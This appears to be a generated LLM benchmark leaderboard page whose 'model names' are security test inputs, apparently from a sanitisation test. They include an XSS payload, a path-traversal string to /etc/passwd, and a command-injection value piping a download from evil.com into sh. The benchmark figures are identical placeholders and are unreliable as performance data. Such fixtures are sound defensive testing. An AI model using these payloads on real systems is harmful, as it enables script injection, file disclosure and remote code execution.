Pentest-Bench — LLM benchmarks
12 workload results across 9 models.
Fastest known config on Pentest-Bench
42.0 decode tok/s, by `<script>alert(1)</script>` via llama.cpp (Q4_K_M)
`<script>alert(1)</script>`
| Workload | Backend | Quant | decode (tok/s) | prefill (tok/s) | TTFT (ms) | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00 | 100.0 | 50.0 | r_a3ei8og3rkg |
`victim`
| Workload | Backend | Quant | decode (tok/s) | prefill (tok/s) | TTFT (ms) | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00 | 100.0 | 50.0 | r_b-ndu-9uswz |
`actual-name`
| Workload | Backend | Quant | decode (tok/s) | prefill (tok/s) | TTFT (ms) | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00 | 100.0 | 50.0 | r_0heij9dzacw |
`beforeafter`
| Workload | Backend | Quant | decode (tok/s) | prefill (tok/s) | TTFT (ms) | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00 | 100.0 | 50.0 | r__zyiw9l3_c5 |
`xy`
| Workload | Backend | Quant | decode (tok/s) | prefill (tok/s) | TTFT (ms) | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00 | 100.0 | 50.0 | r_2nqkbpdq-dk |
`a/b/../../etc/passwd`
| Workload | Backend | Quant | decode (tok/s) | prefill (tok/s) | TTFT (ms) | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00 | 100.0 | 50.0 | r_8zc2yi4had5 |
`$(curl evil.com/x | sh)`
| Workload | Backend | Quant | decode (tok/s) | prefill (tok/s) | TTFT (ms) | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00 | 100.0 | 50.0 | r_kkseorkbdk3 |
`innocent/bin/sh`
| Workload | Backend | Quant | decode (tok/s) | prefill (tok/s) | TTFT (ms) | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00 | 100.0 | 50.0 | r_0laxq0naoht |
`test-model`
| Workload | Backend | Quant | decode (tok/s) | prefill (tok/s) | TTFT (ms) | Run |
|---|---|---|---|---|---|---|
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00 | 100.0 | 50.0 | r_1jskg9qv_8b |
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00 | 100.0 | 50.0 | r_rl-kbwr9chb |
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00 | 100.0 | 50.0 | r_7z262rwoo08 |
| chat-short | llama.cpp@b9999 | Q4_K_M | 42.00 | 100.0 | 50.0 | r_wd6-1z548j_ |
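For readers comparing rows, the three metric columns relate to raw run timings in a standard way: prefill tok/s is prompt tokens divided by time to first token (TTFT), and decode tok/s is generated tokens divided by the remaining wall time. The sketch below is illustrative only; the function name and the input numbers are hypothetical, not taken from any Pentest-Bench run.

```python
def run_metrics(prefill_tokens, decode_tokens, ttft_s, total_s):
    """Derive leaderboard-style metrics from raw timings (illustrative).

    prefill_tokens: prompt tokens processed before the first output token
    decode_tokens:  output tokens generated after the first token appears
    ttft_s:         time to first token, in seconds
    total_s:        total wall time for the run, in seconds
    """
    prefill_tps = prefill_tokens / ttft_s             # prompt-processing rate
    decode_tps = decode_tokens / (total_s - ttft_s)   # steady-state generation rate
    return {
        "decode tok/s": round(decode_tps, 2),
        "prefill tok/s": round(prefill_tps, 1),
        "TTFT ms": round(ttft_s * 1000, 1),
    }

# Hypothetical inputs chosen to match the table's magnitudes:
# 5 prompt tokens in 50 ms -> 100.0 prefill tok/s; 42 output tokens
# in the following second -> 42.00 decode tok/s.
print(run_metrics(prefill_tokens=5, decode_tokens=42, ttft_s=0.05, total_s=1.05))
```

Note that decode tok/s deliberately excludes the prefill phase, so a backend with a slow prompt pass but fast generation can still top the decode column.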
Models measured on Pentest-Bench
`<script>alert(1)</script>`, `victim`, `actual-name`, `beforeafter`, `xy`, `a/b/../../etc/passwd`, `$(curl evil.com/x | sh)`, `innocent/bin/sh`, `test-model`
Common questions about Pentest-Bench
Direct Q&A drawn from the runs above: the fastest LLM, supported model classes, backend rankings, and quantization guidance.